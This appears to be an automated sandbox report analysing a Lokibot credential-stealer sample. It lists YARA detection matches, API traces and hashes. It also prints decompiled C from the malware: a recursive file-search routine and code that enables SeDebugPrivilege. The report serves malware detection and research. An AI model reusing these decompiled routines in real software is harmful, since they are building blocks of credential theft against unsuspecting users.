Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Loki_1, Description: Loki Payload, Source: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Loki_1, Description: Loki Payload, Source: 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000009.00000002.545669843.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Loki_1, Description: Loki Payload, Source: 00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Loki_1, Description: Loki Payload, Source: 00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Loki_1, Description: Loki Payload, Source: 00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: ZciowjM9hN.exePID: 6328, Parent PID: 4180COMMON

Execution Graph

Execution Coverage:	16.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	180
Total number of Limit Nodes:	3

Executed Functions

Function 010E9530 Relevance: 1.7, APIs: 1, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 010E9776

Memory Dump Source

Source File: 00000000.00000002.319163834.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10e0000_ZciowjM9hN.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9271af586ad9775b194e67e2561917617fd9c4e5a03ddbef3bbeef030da7a9c6
Instruction ID: ae5d67fd6637c42def13b6348e2cafc7cf60a5b58898d5d65afb7df6ccbf15a8
Opcode Fuzzy Hash: 9271af586ad9775b194e67e2561917617fd9c4e5a03ddbef3bbeef030da7a9c6
Instruction Fuzzy Hash: 02715770A00B058FDB64DF6AD14479ABBF1BF88308F00896ED59AD7A40EB34E905CF91

Uniqueness

Uniqueness Score: -1.00%

Function 051C0040 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 051C0152

Memory Dump Source

Source File: 00000000.00000002.322228899.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51c0000_ZciowjM9hN.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ef7a9ce9a4ca6482269aee22564575a6e102960a23f72fcf5e81e8ac3c2a26fd
Instruction ID: 237268768b90f2c52406a725a82c1b9e8636f505f38106585c416307977ef208
Opcode Fuzzy Hash: ef7a9ce9a4ca6482269aee22564575a6e102960a23f72fcf5e81e8ac3c2a26fd
Instruction Fuzzy Hash: 0141AEB1D04349DFDB14CF99C884ADEBFB5BF48314F24816AE819AB214D7759885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 010E5364 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010E5421

Memory Dump Source

Source File: 00000000.00000002.319163834.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10e0000_ZciowjM9hN.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e9a7f55f759a9e8e992c7a07fd8ef2ad93133962a3668ff3721c1d0da463ca46
Instruction ID: 7d5697f7b57b509d29bfefa39603a299b250ca6b904f842ce3bf8043f7f583a4
Opcode Fuzzy Hash: e9a7f55f759a9e8e992c7a07fd8ef2ad93133962a3668ff3721c1d0da463ca46
Instruction Fuzzy Hash: 0441FFB1D0421CCEDB24CFAAC884BDEBBF1BF48308F24846AD509AB251DB755945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 010E3E08 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010E5421

Memory Dump Source

Source File: 00000000.00000002.319163834.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10e0000_ZciowjM9hN.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 95da710b723ddd3dcf7bf87c8294d3c524bc98767ccc70355fa6e60465a9ecf8
Instruction ID: 315a5982fae02886a79c88bf0ea8fa24b3e706e26353128e5496188922cd174d
Opcode Fuzzy Hash: 95da710b723ddd3dcf7bf87c8294d3c524bc98767ccc70355fa6e60465a9ecf8
Instruction Fuzzy Hash: F641C1B0D0461CCFDB24DFAAC884B9EBBF5BF48308F208459D509AB255DB756945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 051C2600 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 051C26C1

Memory Dump Source

Source File: 00000000.00000002.322228899.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51c0000_ZciowjM9hN.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 337d7aa6e66d0bd3cb4a72999169ba41275b9b399e8ae1aa9a7ff8c01e4992e3
Instruction ID: 2bd7e1c954dbda9378309f1334a703a167259d128e32da195711053ebd01be27
Opcode Fuzzy Hash: 337d7aa6e66d0bd3cb4a72999169ba41275b9b399e8ae1aa9a7ff8c01e4992e3
Instruction Fuzzy Hash: 8E415BB89003098FCB14CF99C488AAABBF5FB98314F24848DD559A7320D775A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 010EBB11 Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,010EBA16,?,?,?,?,?), ref: 010EBAD7

Memory Dump Source

Source File: 00000000.00000002.319163834.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10e0000_ZciowjM9hN.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 44e5f77e91c729d9ddea32ddac45f41733f216249bc6adac4962a2459d793c9e
Instruction ID: 41d3d69975808302e74624c9e66b56d2187f3a200d7ecc5ebf071365b2295ea0
Opcode Fuzzy Hash: 44e5f77e91c729d9ddea32ddac45f41733f216249bc6adac4962a2459d793c9e
Instruction Fuzzy Hash: DB3145B4A503459FEB019B60E65A76D3FB5FB89305F28406AE942CFBD9CF394902CB11

Uniqueness

Uniqueness Score: -1.00%

Function 010EAC5C Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,010EBA16,?,?,?,?,?), ref: 010EBAD7

Memory Dump Source

Source File: 00000000.00000002.319163834.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10e0000_ZciowjM9hN.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d73e0d043eed616a8636335beb0567e6b2ccf8579ba8ce0fb1873b9cff995bbe
Instruction ID: 4443109c0a0d5a036bb1b9f962a8739ed76756bc7748b904ceb79ec3bfd36199
Opcode Fuzzy Hash: d73e0d043eed616a8636335beb0567e6b2ccf8579ba8ce0fb1873b9cff995bbe
Instruction Fuzzy Hash: AD21E3B590020DAFDF10CF9AD484ADEBBF8EB48324F14805AE955A7310D374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 010EBA49 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,010EBA16,?,?,?,?,?), ref: 010EBAD7

Memory Dump Source

Source File: 00000000.00000002.319163834.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10e0000_ZciowjM9hN.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6c676aa192bc713b19f4fd76cf1a5cf74fd65f1539022b0e8eed4f306c19065b
Instruction ID: 9dcf2306bad4890f3dbac043ac1bec617d1479e399c5ff105b38ad7f02139a7b
Opcode Fuzzy Hash: 6c676aa192bc713b19f4fd76cf1a5cf74fd65f1539022b0e8eed4f306c19065b
Instruction Fuzzy Hash: 2621EFB5D002089FDF10CFAAD584AEEBBF8FB48324F14845AE955A3310D378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 010E8A90 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010E97F1,00000800,00000000,00000000), ref: 010E9A02

Memory Dump Source

Source File: 00000000.00000002.319163834.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10e0000_ZciowjM9hN.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c6852b7ddd5c251839560ab7610cb81ceefd897d21f17eeebdc94000d6a1dfd1
Instruction ID: 6228cd5991eaf7c9158d5b47e7bbd07e807f6a79360c47e07d54043f1a4467d3
Opcode Fuzzy Hash: c6852b7ddd5c251839560ab7610cb81ceefd897d21f17eeebdc94000d6a1dfd1
Instruction Fuzzy Hash: BD1112B2D043098FDB10CF9AD448ADEFBF4EB88364F14846EE559A7600D374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010E9990 Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010E97F1,00000800,00000000,00000000), ref: 010E9A02

Memory Dump Source

Source File: 00000000.00000002.319163834.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10e0000_ZciowjM9hN.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: cbf4831031df15a7ea11a27696dcd76110d36dbbd37097d624bae18fa124958e
Instruction ID: 482f8fc5ca785215bf00762a3297d08dcdacd4deb1f57fd1e278c1e4ce859977
Opcode Fuzzy Hash: cbf4831031df15a7ea11a27696dcd76110d36dbbd37097d624bae18fa124958e
Instruction Fuzzy Hash: 931153B2C002498FCB10CF9AD448ADEFBF8EB88324F14806EE555A7700C374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010E9710 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 010E9776

Memory Dump Source

Source File: 00000000.00000002.319163834.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10e0000_ZciowjM9hN.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9360477bf8b0361ff63f98ae67162c362db73868adcd2160f99d880ce02e5170
Instruction ID: dd00b285d9f53f775a3e4f548cef773fe1e56f368c8ef954fdc0fda415af5bf5
Opcode Fuzzy Hash: 9360477bf8b0361ff63f98ae67162c362db73868adcd2160f99d880ce02e5170
Instruction Fuzzy Hash: B311E0B5C006498FDB20CF9AD448BDEFBF8EB88324F14855AD569B7600D374A549CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 051C0288 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowLongW.USER32(?,?,?), ref: 051C02E5

Memory Dump Source

Source File: 00000000.00000002.322228899.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51c0000_ZciowjM9hN.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 9745d2319d6c99dbc7702d4e9294115381d63472d1f097ec3c0268116f17935e
Instruction ID: 153b7771003165f93b7eff3c89eb49ab93b5c23999379db88819a6175832139c
Opcode Fuzzy Hash: 9745d2319d6c99dbc7702d4e9294115381d63472d1f097ec3c0268116f17935e
Instruction Fuzzy Hash: 581112B5800209CFDB20CF9AD588BDEBBF8FB48324F20845AE955A7700D374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 010EE710 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.319163834.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10e0000_ZciowjM9hN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16e0d89413e0e44c44fbd0be1d2a6b50fa1e04233520d95478ae0e87bb5bc064
Instruction ID: 1165f228bc2f6742da8956c873816a2551847f8d51885d47b984bfabed93a31f
Opcode Fuzzy Hash: 16e0d89413e0e44c44fbd0be1d2a6b50fa1e04233520d95478ae0e87bb5bc064
Instruction Fuzzy Hash: 561282B94217468AE710CF65ED9A28D3FE1B745328FD05308E2A16BAD1DBBC114BCF94

Uniqueness

Uniqueness Score: -1.00%

Function 010EC344 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.319163834.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10e0000_ZciowjM9hN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86a1c71501e68b6cde7330102ddc84be5e78b22b87f57ff79f253a86b871890d
Instruction ID: 6126f5be120190d07d868a3260d71c8cf8b138e2c4b94ebead4a8e8f6ce7aaee
Opcode Fuzzy Hash: 86a1c71501e68b6cde7330102ddc84be5e78b22b87f57ff79f253a86b871890d
Instruction Fuzzy Hash: D6A15032E1021A8FDF05DFB5C9485DEBBF2FF84300B1585AAE945BB261EB359905CB40

Uniqueness

Uniqueness Score: -1.00%

Function 010EE701 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.319163834.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10e0000_ZciowjM9hN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ccaffd59617f983755343b5f85f808f6b80b8380eb72306e3325105c694e5c7
Instruction ID: b23b2157109cedb9ee1916a5e2183a2e50cf70fae5d780a2a4395bf62f5f0291
Opcode Fuzzy Hash: 9ccaffd59617f983755343b5f85f808f6b80b8380eb72306e3325105c694e5c7
Instruction Fuzzy Hash: FCC1E5B58217468AD710DF65EC9A18D7FB1BB85328F914308E2A16BAD0DFBC114BCF94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ZciowjM9hN.exePID: 6976, Parent PID: 6328COMMON

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}

0x00403d82
0x00403d88
0x00403d8c
0x00403d8d
0x00403d90
0x00403ea9
0x00403ea9
0x00403eb9
0x00403ebb
0x00403ec0
0x00403f95
0x00403f95
0x00000000
0x00403f95
0x00403ece
0x00403edb
0x00403edd
0x00403ee2
0x00403f8e
0x00403f8f
0x00000000
0x00403f94
0x00000000
0x00403ee8
0x00403ef8
0x00403f0a
0x00403f12
0x00403f18
0x00403f26
0x00403f28
0x00403f2d
0x00000000
0x00000000
0x00403f33
0x00403f76
0x00403f7c
0x00000000
0x00403f83
0x00403f36
0x00403f3a
0x00000000
0x00403f40
0x00403f0c
0x00403f10
0x00000000
0x00000000
0x00000000
0x00403f41
0x00403f41
0x00403f4b
0x00403f58
0x00403f5c
0x00403f88
0x00000000
0x00403f8d
0x00403f60
0x00000000
0x00403f60
0x00403ef8
0x00403ee8
0x00403da3
0x00403da9
0x00403ea6
0x00403ea8
0x00000000
0x00403ea8
0x00403db7
0x00403dc4
0x00403dc6
0x00403dcb
0x00403e9d
0x00403e9e
0x00403ea4
0x00000000
0x00000000
0x00000000
0x00000000
0x00403dd1
0x00403dd1
0x00403dd8
0x00000000
0x00000000
0x00403de2
0x00403e12
0x00403e22
0x00403e30
0x00403e36
0x00403e3f
0x00403e44
0x00403e47
0x00403e4a
0x00403e4c
0x00000000
0x00000000
0x00403e63
0x00403e65
0x00403e6a
0x00403e6f
0x00403f64
0x00403f6a
0x00000000
0x00403f71
0x00000000
0x00403e6f
0x00403e26
0x00403e27
0x00403e2e
0x00000000
0x00000000
0x00000000
0x00403e2e
0x00403dea
0x00403df9
0x00000000
0x00000000
0x00403e01
0x00403e10
0x00000000
0x00000000
0x00000000
0x00403e75
0x00403e7f
0x00403e8c
0x00403e8e
0x00403e97
0x00000000

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Windows, xrefs: 00403DEA
%s\*, xrefs: 00403D99
Program Files, xrefs: 00403E01
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Uniqueness

Uniqueness Score: -1.00%

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}

0x00406512
0x00406514
0x00406522
0x00406524
0x00406530
0x00406534
0x0040653f
0x0040654e
0x00406552
0x0040655a
0x0040655f
0x0040656d
0x00406570
0x00406573
0x0040657a
0x00406589
0x0040658d
0x00406590
0x00406594
0x00000000
0x0040659a
0x004065a1

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

